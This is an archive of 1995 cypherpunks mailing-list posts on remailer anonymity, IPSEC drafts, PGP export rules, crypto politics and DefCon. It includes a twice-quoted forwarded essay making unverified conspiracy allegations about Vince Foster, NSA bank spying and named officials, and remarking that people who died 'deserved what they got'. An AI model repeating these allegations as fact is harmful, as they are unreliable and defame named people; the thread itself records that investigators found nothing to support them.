MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> For those interested in reading up on the IPSEC work, check out
> ds.internic.net's "internet-drafts" directory. 

Another place I found them is in ftp://ietf.cnri.reston.va.us/internet-drafts/

(ds.internic.net seems to be hosed today (!))

There's a brief summary of each IPSEC draft, with hyperlinks to the texts, at 
http://www.ietf.cnri.reston.va.us/ids.by.wg/ipsec.html



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 24 Jul 95 16:49:41 PDT
To: anon-remailer@utopia.hacktic.nl (Anonymous)
Subject: Re: An idea about Java and remailer clients and servers...
In-Reply-To: <199507242313.BAA27191@utopia.hacktic.nl>
Message-ID: <199507242349.TAA23120@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Phil Fraering writes:
> >  Why not "charge" for the ability to send an anonymous message with
> >  the duty to have for a short time (maybe an hour or two) running
> >  on your machine a node in a remailer network?
> 
> User X on Machine A sends a form via HTTP (or a variant- SHTTP, HTTPS, etc.)
> to Machine B.  User Y on Machine C receives an anonymous mail from Machine
> B.  Suspecting User X, User Y sends a mail to be anonymized and sent back to
> himself to User X.  User X's temporary remailer does as it's told.  User Y
> now has a strong reason to suspect User X has sent the said mail.

  If the "duty" cycle is 1 hour and there are 10000 users utilizing
the network, that tells you nothing. All it does it confirm that
User X sent a remailer message within the last hour. One could just
as easily finger User X and use the same reasoning.

  And if one has to suspect User X in the first place, User X has already
blown his cover partially (either by writing style or other leaks)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 24 Jul 95 16:55:30 PDT
To: cypherpunks@toad.com
Subject: Re: An idea about Java and remailer clients and servers...
In-Reply-To: <199507242313.BAA27191@utopia.hacktic.nl>
Message-ID: <199507242355.TAA26223@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Phil Fraering writes:
> >  Why not "charge" for the ability to send an anonymous message with
> >  the duty to have for a short time (maybe an hour or two) running
> >  on your machine a node in a remailer network?
> 
> User X on Machine A sends a form via HTTP (or a variant- SHTTP, HTTPS, etc.)
> to Machine B.  User Y on Machine C receives an anonymous mail from Machine
> B.  Suspecting User X, User Y sends a mail to be anonymized and sent back to
> himself to User X.  User X's temporary remailer does as it's told.  User Y

 I forgot to add. There is no reason User X has to run his remailer
immediately. His software could simply commit to running a remailer for
1 hour at some specified future date < some threshold. Any messages
sent to him for remailing would be queued until that time. Therefore,
all your technique would tell you is that the user remailed a message
sometime between date X and date Y. if Y-X > few days to week or two,
the intelligence gathered on User X is miniscule. Traffic analysis would
detect User X using the remailer network anyway.

-Ray







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 24 Jul 95 18:18:15 PDT
To: cypherpunks@toad.com
Subject: An idea about Java and remailer clients and servers...
In-Reply-To: <199507242313.BAA27191@utopia.hacktic.nl>
Message-ID: <199507250113.AA24873@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous writes, concerning the "you want a remailer, you run one" idea:

   User X on Machine A sends a form via HTTP (or a variant- SHTTP, HTTPS, etc.)
   to Machine B.  User Y on Machine C receives an anonymous mail from Machine
   B.  Suspecting User X, User Y sends a mail to be anonymized and sent back to
   himself to User X.  User X's temporary remailer does as it's told.  User Y
   now has a strong reason to suspect User X has sent the said mail.

   Cpunks write code and all, but I don't think this one's going to work. :-(

I was thinking in terms of User X running one node in a mixmaster
network. AFAIK, mixmaster doesn't work in one-bounce mode; otherwise,
why would it go through all the trouble of breaking up the messages,
etc.?

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Mon, 24 Jul 95 18:45:44 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: An idea about Java and remailer clients and servers...
In-Reply-To: <199507250113.AA24873@tyrell.net>
Message-ID: <199507250145.VAA08413@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering writes:
> I was thinking in terms of User X running one node in a mixmaster
> network. AFAIK, mixmaster doesn't work in one-bounce mode; 

The sender can ask the client to set the number of hops as low as 1, if 
she/it/he so desires.

I think Doug Barnes has suggested the best protocol for handling "co-op
remailing" ;)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Mon, 24 Jul 95 14:12:17 PDT
To: cypherpunks@toad.com
Subject: Regulatory Arbitrage Server
Message-ID: <199507242112.AA00932@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Please check out:

 'http://www.replay.com/exon',


for the problems and suggestions about the scripts mail
Adam Back <aba@dcs.ex.ac.uk>

for flames mail me.

Have Fun!
--
Alex de Joode
Fear Uncertainty and Doubt, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 24 Jul 95 21:18:22 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <Pine.SUN.3.91.950713143406.17575A-100000@crl8.crl.com>
Message-ID: <Pine.3.89.9507242320.A14545-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 13 Jul 1995, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Thu, 13 Jul 1995, Perry E. Metzger wrote:
> 
> > As unpleasant as the congress is, it isn't the enemy. The governmental
> > forces desiring control are not the same as the congress.
> 
> I'm not so sure.  Both politicos and bureaucrats go into their
> respective lines of work for many reasons.  One of the main 
> reasons--in my opinion--is a lust to control others.  Being the 
> "others," we should resist this tendancy.  This begins with the
> realization that most of them *are* the enemy and acting 
> accordingly.
> 

Well, now, I wouldn't say THAT....

There are those of us intent enough of defending our rights as to go so 
far as to make an effort of getting to where we can do so more easily.  
While I know I was shouted down over NYET, the group does know where I 
stand on the issue of, for instance, free crypto or the Exon Hustler 
Protection Act.  I intend to run for JP in '98, and (assuming our 
electoral system, if not our Constition is still intact) higher office 
later.  If I win, you can bet your keyring passwords that _I_ will make 
sure that my juries are aware of FIJAs position papers.

There are others--including one John Tello, a member of the Texas State 
Republican Executive Committee, who almost single handedly got a unanimous 
resolution out of the TX SREC calling for an end of our 60-year emergency 
and a recision of various related acts.

Bluntly, if you are bellyaching but _not_ involved with an organized 
political structure that is capable of influencing legislation, then I 
blame YOU for this legislation.  I am, have, and/or shall have lobbied every 
Congressman with whom I can claim a minimal connection.  And I've done 
the work so that this is a non-trivial list.

Direct mail is useful.  But until you've worked to get someone elected, 
you are just one more voice in the roar.  The '96 campaigns are shaping 
up.  (I'm already putting the word out for '98...)  This is the time to 
find people who share our views, and work so that they win their 
primaries--or maybe don't even have to fight one.  Or maybe its time 
_you_ ran.


Nathan

Crypto-Christo-punk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Mon, 24 Jul 95 21:26:27 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying (fwd)
In-Reply-To: <Pine.SOL.3.91.950724234854.130D-100000@use.usit.net>
Message-ID: <Pine.SOL.3.91.950724232244.24512K-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Okay, thing is, I read all of the below, and it seems like 
the guy's trying hard to tell you that he'd bend over 
backward to make this case, even to the extent of associating
with fringebinges like you, but your stuff keeps coming up
fulla, um, thin air.  Huh?

MacN

On Mon, 24 Jul 1995, Brad Dolan wrote:

> 
> 
> ---------- Forwarded message ----------
> Date: Mon, 24 Jul 1995 23:11:45 -0400 (EDT)
> From: KALLISTE@delphi.com
> Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
>    Allegations Regarding Vince Foster, the NSA, and
> 	 Banking Transaction Spying, Part IX 
> 
> 		  by J. Orlin Grabbe
> 
> 
> July 23, 1995
> 
> Gregory Wierzynski
> Assistant Staff Director
> U.S. House of Representatives
> Committee on Banking and Financial Services
> 2129 Rayburn Building
> Washington, D.C. 20515
> 202-225-7502
> 
> Dear Mr. Wierzynski:
> 
> Thank you for email letter, a copy of which is attached.
> 
> I am not sure why you think my quoting selections from Mr. Jim Norman 
> necessarily implies endorsement or acceptance of them on my part.  I have, 
> of course, quoted many, many selections from Mr. Norman, so perhaps you 
> could be more specific with respect to the ones you are concerned about.
> 
> Perhaps I could be of assistance to your inquiries among the spooks, if 
> only you could describe to me which points you have investigated, and how 
> you have investigated them. I certainly wouldn't want to promote anything 
> that, as you say, "flied in the face of facts."  
> 
> On the other hand, I am greatly concerned about the use by Alltel 
> Information Services (formerly Systematics) of a libel attorney, 
> Charles O. Morgan, in an attempt to intimidate journalists and destroy 
> the First Amendment to the U.S. Constitution.  
> 
> And I am also gravely concerned about the possible leak of U.S. codes 
> and nuclear secrets to a foreign power, which is an issue of *real* 
> national security concern to the U.S.  (Of course you and I both know 
> that "national security" is often used to hide the truth about sell-outs 
> of national security from the American people, by clamping a lid on 
> the discussion or reporting of things that are common knowledge among 
> U.S. military and security agencies, and even common knowledge to the 
> general public of the foreign power to which these secrets have been 
> compromised.)   
> 
> Before reading my email, and your letter, I sent you a copy of "Part VIII:  
> Allegations Regarding Vince Foster, the NSA, and Banking Transactions 
> Spying".  There you will see from the quotes that the theft of U.S. 
> nuclear secrets by Israel is openly discussed in Israeli newspapers, so 
> I am sure that this is not one of the "off-the-wall" issues to which 
> you are referring.  (With respect to that issue, I suggest that you do 
> some investigation in Tel Aviv.)
> 
> With respect to money laundering I am not concerned,  for reasons I have 
> indicated in my essay "The End of Ordinary of Money",  Parts I and II,  
> a copy of which I previously provided the Committee.  The money-laundering 
> laws ought to be abolished, but in the meantime I do find the selective 
> enforcement of these laws troubling.
> 
> With respect to "Chuck in Kentucky", I know more than one Chuck in Kentucky,
> so perhaps you could be more specific which Chuck you refer to.  What stories 
> did he tell you, and how is it that they didn't pan out?
> 
> Since you have already spoken to both Jim and Chuck, I am taking the liberty 
> of sending a copy of this letter (and your letter) to Jim Norman, and to one 
> possible Chuck you may be referring to, so that perhaps they can explain to 
> me their failing to satisfy you as to the accuracy of their information.
> 
> Now, Mr. Wierzynski, I would like to bring up an issue about your Committee's 
> behavior that is troubling me.  I am sure that there is an innocent 
> explanation that I am missing. You will recall the meeting that I had with 
> you and Mr. Stephen Ganis, the Counsel to the Committee, at the Four Seasons 
> in Georgetown on Monday, June 12, 1995.  Two days previously I had been 
> playing volleyball in the Mall with Dana Rohrbacher and Jack Wheeler and some 
> others, and I had pulled most of the muscles in my right ankle.  So I 
> asked everyone I was meeting to come over to the hotel, and you and Mr. Ganis 
> graciously consented.  We met in the Four Seasons lounge, where I was the 
> only person not wearing shoes.    
> 
> You told me that, more than money laundering in Mena, Arkansas, you were 
> interested as to whether there were any documents connecting Vince Foster 
> to Systematics, or whether I knew the name of any Systematics programmers 
> that may have worked to modify the PROMIS software to spy on banking 
> transactions.  I told you I couldn't recall seeing any such documents, and 
> that I had come across the name of one programmer, but I had subsequently 
> forgotten it.  It was a pleasant meeting, so to be helpful I gave you a 
> copy of Jim Norman's *Fostergate* that had been spiked from *Forbes*.  
> "Why would Steve Forbes kill the article?" you asked.  I said I didn't 
> know, but that--since you appeared to know Steve Forbes--you should call 
> him yourself.
> 
> Now, much to my surprise, I find that the following happened:  Just as 
> *Media Bypass* was about to run Jim Norman's article *Fostergate*, they 
> received a letter from Charles O. Morgan, indicating grave consequences 
> if they were so foolish as to print the article. Mr. Morgan claimed to know 
> what was in the article, because, he said, he had received a copy from Mr. 
> Stephen Ganis of your Committee!  
> 
> I am bothered by the fact that while you alleged to me you were investigating 
> Systematics that at the same time you are passing along information to 
> Systematics.  I am sure there is an innocent explanation.  But consider this:  
> what if I had given you Foster-related documents and the names of Systematics 
> programmers?  Would these have been passed along to Mr. Morgan also?  As you 
> know, a number of people connected to this whole business have died violent 
> deaths in Arkansas.  (Of course, I understand some of them had already been 
> paid off to keep their mouths shut, and didn't, and so--under any standard of 
> morality--deserved what they got.)  
> 
> Well, things are never what they appear, so perhaps you can clear things up 
> for me. Please pass along my concern to Mr. Ganis, and tell him I will be 
> glad to sit down with him and have a drink, or share a line, and have a frank 
> discussion about this issue. (I have nothing against the use of any drug, if 
> used in moderation, and in the appropriate context.) 
>    
> Regards,
> Orlin
> 
> Attachment:  Your letter to me
> - ---------------------------------------------------------------------
> 
> From:   IN%"gregorw@netcom.com" 23-JUL-1995 19:53:52.82
> To:     IN%"KALLISTE@delphi.com"
> CC:     
> Subj:   RE:  Part VII
> 
> Return-path: <gregorw@netcom.com>
> Received: from netcom13.netcom.com by delphi.com (PMDF V4.3-9 #10880)
>  id <01HT7ZLMQQTC9VUSVZ@delphi.com>; Sun, 23 Jul 1995 19:53:50 -0400 (EDT)
> Received: by netcom13.netcom.com (8.6.12/Netcom) id QAA03469; Sun,
>  23 Jul 1995 16:51:04 -0700
> Date: Sun, 23 Jul 1995 16:51:04 -0700
> From: gregorw@netcom.com (Gregory Wierzynski)
> Subject: Re:  Part VII
> To: KALLISTE@delphi.com
> Message-id: <199507232351.QAA03469@netcom13.netcom.com>
> Content-transfer-encoding: 7BIT
> 
> Orlin --
> 
> We're reading your stuff with interest. Thank you for including me in your 
> list of recipients; I pass the material on to my boss and my colleagues on 
> the Committee.
> 
> I am somewhat surprised, however, that you accept the Norman piece without 
> raising any questions about its sources. We've talked to Jim and tried to 
> check out the sources he thought he could share with us. We have also done 
> a fair amount of investigating on our own using the resources available to 
> us--by which I mean officials inquiries to the spooks. So far we draw a 
> complete blank. Worse, the preponderance of the evidence suggests that 
> Jim's piece is pretty much off-the-wall. Worse still, it appears to fly in 
> the face not just of facts, but simple logic as well. 
> 
> I haven't, by any means, given up on this subject, but pursuing a trail 
> grown cold is difficult to justify when you're paid by the taxpayer.
> 
> Do you have suggestions on how we could verify some of the elements in the 
> Norman story? I've talked to Chuck in Kentucky and am still in touch with 
> him. But his stories have not panned out, even partially. I would be most 
> interested in your ideas. 
> 
> Best regards. 
> Greg
> 
> - -
> 
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMBP21mX1Kn9BepeVAQGP3AP9Hm/kwmUuz9kNH+q9D728Xe6rdHHPjpT8
> bAxwzIK9UsJsIF5oLfjTVWovEtGBj3QvJlmFY7hkVFZAYpx6q4R65NUX/ZpHtKaF
> QDugRJZJUxKRaD+9CYepFFt6+ZTK8pQr+me3CgY1ZBVbdNZL4LE9rLFA1Z4XD/vL
> csNGnDpuTq0=
> =t4hx
> -----END PGP SIGNATURE-----
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Veeneman <system@decode.com>
Date: Mon, 24 Jul 95 21:12:36 PDT
To: cypherpunks@toad.com
Subject: Anyone going to DEFCON
Message-ID: <X9ZR9c2w165w@decode.com>
MIME-Version: 1.0
Content-Type: text/plain


QLDM75A@prodigy.com (MR ELDON B JENKINS) writes:

> I don't know if anyone else from this list is going but I will be 
> there for the whole conference and wouldn't mind meeting up with some 
> of the people from this list.

[...]

I am also planning on attending DefCon, and would be interested in meeting
up with some Cypherpunks.

> Eldon Jenkins

Dan


--
system@decode.com (Dan Veeneman)
Cryptography, Security, Privacy BBS  +1 410 730 6734   Data/FAX




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 24 Jul 95 20:55:27 PDT
To: cypherpunks@toad.com
Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying (fwd)
Message-ID: <Pine.SOL.3.91.950724234854.130D-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 24 Jul 1995 23:11:45 -0400 (EDT)
From: KALLISTE@delphi.com
Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying

-----BEGIN PGP SIGNED MESSAGE-----

   Allegations Regarding Vince Foster, the NSA, and
	 Banking Transaction Spying, Part IX 

		  by J. Orlin Grabbe


July 23, 1995

Gregory Wierzynski
Assistant Staff Director
U.S. House of Representatives
Committee on Banking and Financial Services
2129 Rayburn Building
Washington, D.C. 20515
202-225-7502

Dear Mr. Wierzynski:

Thank you for email letter, a copy of which is attached.

I am not sure why you think my quoting selections from Mr. Jim Norman 
necessarily implies endorsement or acceptance of them on my part.  I have, 
of course, quoted many, many selections from Mr. Norman, so perhaps you 
could be more specific with respect to the ones you are concerned about.

Perhaps I could be of assistance to your inquiries among the spooks, if 
only you could describe to me which points you have investigated, and how 
you have investigated them. I certainly wouldn't want to promote anything 
that, as you say, "flied in the face of facts."  

On the other hand, I am greatly concerned about the use by Alltel 
Information Services (formerly Systematics) of a libel attorney, 
Charles O. Morgan, in an attempt to intimidate journalists and destroy 
the First Amendment to the U.S. Constitution.  

And I am also gravely concerned about the possible leak of U.S. codes 
and nuclear secrets to a foreign power, which is an issue of *real* 
national security concern to the U.S.  (Of course you and I both know 
that "national security" is often used to hide the truth about sell-outs 
of national security from the American people, by clamping a lid on 
the discussion or reporting of things that are common knowledge among 
U.S. military and security agencies, and even common knowledge to the 
general public of the foreign power to which these secrets have been 
compromised.)   

Before reading my email, and your letter, I sent you a copy of "Part VIII:  
Allegations Regarding Vince Foster, the NSA, and Banking Transactions 
Spying".  There you will see from the quotes that the theft of U.S. 
nuclear secrets by Israel is openly discussed in Israeli newspapers, so 
I am sure that this is not one of the "off-the-wall" issues to which 
you are referring.  (With respect to that issue, I suggest that you do 
some investigation in Tel Aviv.)

With respect to money laundering I am not concerned,  for reasons I have 
indicated in my essay "The End of Ordinary of Money",  Parts I and II,  
a copy of which I previously provided the Committee.  The money-laundering 
laws ought to be abolished, but in the meantime I do find the selective 
enforcement of these laws troubling.

With respect to "Chuck in Kentucky", I know more than one Chuck in Kentucky,
so perhaps you could be more specific which Chuck you refer to.  What stories 
did he tell you, and how is it that they didn't pan out?

Since you have already spoken to both Jim and Chuck, I am taking the liberty 
of sending a copy of this letter (and your letter) to Jim Norman, and to one 
possible Chuck you may be referring to, so that perhaps they can explain to 
me their failing to satisfy you as to the accuracy of their information.

Now, Mr. Wierzynski, I would like to bring up an issue about your Committee's 
behavior that is troubling me.  I am sure that there is an innocent 
explanation that I am missing. You will recall the meeting that I had with 
you and Mr. Stephen Ganis, the Counsel to the Committee, at the Four Seasons 
in Georgetown on Monday, June 12, 1995.  Two days previously I had been 
playing volleyball in the Mall with Dana Rohrbacher and Jack Wheeler and some 
others, and I had pulled most of the muscles in my right ankle.  So I 
asked everyone I was meeting to come over to the hotel, and you and Mr. Ganis 
graciously consented.  We met in the Four Seasons lounge, where I was the 
only person not wearing shoes.    

You told me that, more than money laundering in Mena, Arkansas, you were 
interested as to whether there were any documents connecting Vince Foster 
to Systematics, or whether I knew the name of any Systematics programmers 
that may have worked to modify the PROMIS software to spy on banking 
transactions.  I told you I couldn't recall seeing any such documents, and 
that I had come across the name of one programmer, but I had subsequently 
forgotten it.  It was a pleasant meeting, so to be helpful I gave you a 
copy of Jim Norman's *Fostergate* that had been spiked from *Forbes*.  
"Why would Steve Forbes kill the article?" you asked.  I said I didn't 
know, but that--since you appeared to know Steve Forbes--you should call 
him yourself.

Now, much to my surprise, I find that the following happened:  Just as 
*Media Bypass* was about to run Jim Norman's article *Fostergate*, they 
received a letter from Charles O. Morgan, indicating grave consequences 
if they were so foolish as to print the article. Mr. Morgan claimed to know 
what was in the article, because, he said, he had received a copy from Mr. 
Stephen Ganis of your Committee!  

I am bothered by the fact that while you alleged to me you were investigating 
Systematics that at the same time you are passing along information to 
Systematics.  I am sure there is an innocent explanation.  But consider this:  
what if I had given you Foster-related documents and the names of Systematics 
programmers?  Would these have been passed along to Mr. Morgan also?  As you 
know, a number of people connected to this whole business have died violent 
deaths in Arkansas.  (Of course, I understand some of them had already been 
paid off to keep their mouths shut, and didn't, and so--under any standard of 
morality--deserved what they got.)  

Well, things are never what they appear, so perhaps you can clear things up 
for me. Please pass along my concern to Mr. Ganis, and tell him I will be 
glad to sit down with him and have a drink, or share a line, and have a frank 
discussion about this issue. (I have nothing against the use of any drug, if 
used in moderation, and in the appropriate context.) 
   
Regards,
Orlin

Attachment:  Your letter to me
- ---------------------------------------------------------------------

From:   IN%"gregorw@netcom.com" 23-JUL-1995 19:53:52.82
To:     IN%"KALLISTE@delphi.com"
CC:     
Subj:   RE:  Part VII

Return-path: <gregorw@netcom.com>
Received: from netcom13.netcom.com by delphi.com (PMDF V4.3-9 #10880)
 id <01HT7ZLMQQTC9VUSVZ@delphi.com>; Sun, 23 Jul 1995 19:53:50 -0400 (EDT)
Received: by netcom13.netcom.com (8.6.12/Netcom) id QAA03469; Sun,
 23 Jul 1995 16:51:04 -0700
Date: Sun, 23 Jul 1995 16:51:04 -0700
From: gregorw@netcom.com (Gregory Wierzynski)
Subject: Re:  Part VII
To: KALLISTE@delphi.com
Message-id: <199507232351.QAA03469@netcom13.netcom.com>
Content-transfer-encoding: 7BIT

Orlin --

We're reading your stuff with interest. Thank you for including me in your 
list of recipients; I pass the material on to my boss and my colleagues on 
the Committee.

I am somewhat surprised, however, that you accept the Norman piece without 
raising any questions about its sources. We've talked to Jim and tried to 
check out the sources he thought he could share with us. We have also done 
a fair amount of investigating on our own using the resources available to 
us--by which I mean officials inquiries to the spooks. So far we draw a 
complete blank. Worse, the preponderance of the evidence suggests that 
Jim's piece is pretty much off-the-wall. Worse still, it appears to fly in 
the face not just of facts, but simple logic as well. 

I haven't, by any means, given up on this subject, but pursuing a trail 
grown cold is difficult to justify when you're paid by the taxpayer.

Do you have suggestions on how we could verify some of the elements in the 
Norman story? I've talked to Chuck in Kentucky and am still in touch with 
him. But his stories have not panned out, even partially. I would be most 
interested in your ideas. 

Best regards. 
Greg

- -



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBP21mX1Kn9BepeVAQGP3AP9Hm/kwmUuz9kNH+q9D728Xe6rdHHPjpT8
bAxwzIK9UsJsIF5oLfjTVWovEtGBj3QvJlmFY7hkVFZAYpx6q4R65NUX/ZpHtKaF
QDugRJZJUxKRaD+9CYepFFt6+ZTK8pQr+me3CgY1ZBVbdNZL4LE9rLFA1Z4XD/vL
csNGnDpuTq0=
=t4hx
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Tue, 25 Jul 95 00:29:18 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster for DOS Yet?
Message-ID: <ac3a497c050210046825@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:16 PM 7/22/95, bluebird@alpha.c2.org wrote:
>[Please reply via netmail or Cc: - I have only periodic access to list.]
>
>Is the Mixmaster user software for DOS platforms completed yet?
>
>Thanks for any help.

Not yet. It should be out shortly after the next Mixmaster release.
I will make a lot of noise when I release the DOS code. You will not miss it.

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 24 Jul 95 21:58:22 PDT
To: cypherpunks@toad.com
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
Message-ID: <199507250455.AAA13908@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <m0saTpk-0005BTC@nrk.com>, wb8foz@nrk.com (David Lesher) wrote:

>marc:
>> However, goods of U.S. origin are export restricted, unless said
>> goods are further processed outside the U.S. so as to result in a
>> substantial change in value, so some of the PGP development would
>> need to be done in Canada.
>
>How about compiling it? THAT is "further processing"......

I am not sure that would hold. After all, the disk with the source code to
"Applied Cryptography" was denied an export license, because the source
code could be compiled into libraries.
<What kind of drugs are these people on anyway? They really ought to quit.>

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBR5PCoZzwIn1bdtAQGSygGAs0JN64qoFfzC0OEL+yV5p/iWecnTtBeJ
Fm8a7jsIqtV+FsQg7ATQRcpSxtDOnbS2
=He6y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Mon, 24 Jul 95 23:10:45 PDT
To: cypherpunks@toad.com
Subject: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <199507250610.XAA28570@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I am a candidate for the 
Minneapolis City Council, 4th ward.
As a registered Independent.

Now if I can get a campaign donation
to give every resident a copy of PGP,
then I've got it made.

I did run for Parks Commission in '79.
7,000 votes with no money.

Love Always,

Carol Anne


>Direct mail is useful.  But until you've worked to get someone elected, 
>you are just one more voice in the roar.  The '96 campaigns are shaping 
>up.  (I'm already putting the word out for '98...)  This is the time to 
>find people who share our views, and work so that they win their 
>primaries--or maybe don't even have to fight one.  Or maybe its time 
>_you_ ran.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBSJGorpjEWs1wBlAQEJKwQAqtAXLCf5yBvvV9A5fYs2PXnKAxZK/7r6
evqMlnA7YzYF1sCxRAbF82EKJm2oZhsdWYP18m/mj9u8+NVIuj639zxcyeXme/5b
mMurG2itMzhv8AogQp2fPo9bTM0FjurUYLSCwXiFlv5TVeOXv6qYYD6bjVK7HJGM
RkmX40AFiac=
=FEwh
-----END PGP SIGNATURE-----

--

Member Internet Society  -  Certified BETSI Programmer  -   Webmistress
*************************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
carolann@c2.org - carolb@spring.com - carolab@primenet.com
*************************************************************************
My Homepage
The Cyberdoc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 24 Jul 95 22:13:29 PDT
To: Mac Norton <mnorton@cavern.uark.edu>
Subject: Re: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying (fwd)
In-Reply-To: <Pine.SOL.3.91.950724232244.24512K-100000@cavern>
Message-ID: <Pine.SOL.3.91.950725010535.9324A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I found Grabbe's essay sufficiently interesting to forward, but all I
did was forward it.  If you have questions, you will do better to 
address them to: kalliste@delphi.com

bd

On Mon, 24 Jul 1995, Mac Norton wrote:

> Okay, thing is, I read all of the below, and it seems like 
> the guy's trying hard to tell you that he'd bend over 
> backward to make this case, even to the extent of associating
> with fringebinges like you, but your stuff keeps coming up
> fulla, um, thin air.  Huh?
> 
> MacN
> 
> On Mon, 24 Jul 1995, Brad Dolan wrote:
> 
> > 
> > 
> > ---------- Forwarded message ----------
> > Date: Mon, 24 Jul 1995 23:11:45 -0400 (EDT)
> > From: KALLISTE@delphi.com
> > Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying
> > 
> > -----BEGIN PGP SIGNED MESSAGE-----
> > 
> >    Allegations Regarding Vince Foster, the NSA, and
> > 	 Banking Transaction Spying, Part IX 
> > 
> > 		  by J. Orlin Grabbe
> > 
> > 
> > July 23, 1995
> > 
> > Gregory Wierzynski
> > Assistant Staff Director
> > U.S. House of Representatives
> > Committee on Banking and Financial Services
> > 2129 Rayburn Building
> > Washington, D.C. 20515
> > 202-225-7502
> > 
> > Dear Mr. Wierzynski:
> > 
> > Thank you for email letter, a copy of which is attached.
> > 
> > I am not sure why you think my quoting selections from Mr. Jim Norman 
> > necessarily implies endorsement or acceptance of them on my part.  I have, 
> > of course, quoted many, many selections from Mr. Norman, so perhaps you 
> > could be more specific with respect to the ones you are concerned about.
> > 
> > Perhaps I could be of assistance to your inquiries among the spooks, if 
> > only you could describe to me which points you have investigated, and how 
> > you have investigated them. I certainly wouldn't want to promote anything 
> > that, as you say, "flied in the face of facts."  
> > 
> > On the other hand, I am greatly concerned about the use by Alltel 
> > Information Services (formerly Systematics) of a libel attorney, 
> > Charles O. Morgan, in an attempt to intimidate journalists and destroy 
> > the First Amendment to the U.S. Constitution.  
> > 
> > And I am also gravely concerned about the possible leak of U.S. codes 
> > and nuclear secrets to a foreign power, which is an issue of *real* 
> > national security concern to the U.S.  (Of course you and I both know 
> > that "national security" is often used to hide the truth about sell-outs 
> > of national security from the American people, by clamping a lid on 
> > the discussion or reporting of things that are common knowledge among 
> > U.S. military and security agencies, and even common knowledge to the 
> > general public of the foreign power to which these secrets have been 
> > compromised.)   
> > 
> > Before reading my email, and your letter, I sent you a copy of "Part VIII:  
> > Allegations Regarding Vince Foster, the NSA, and Banking Transactions 
> > Spying".  There you will see from the quotes that the theft of U.S. 
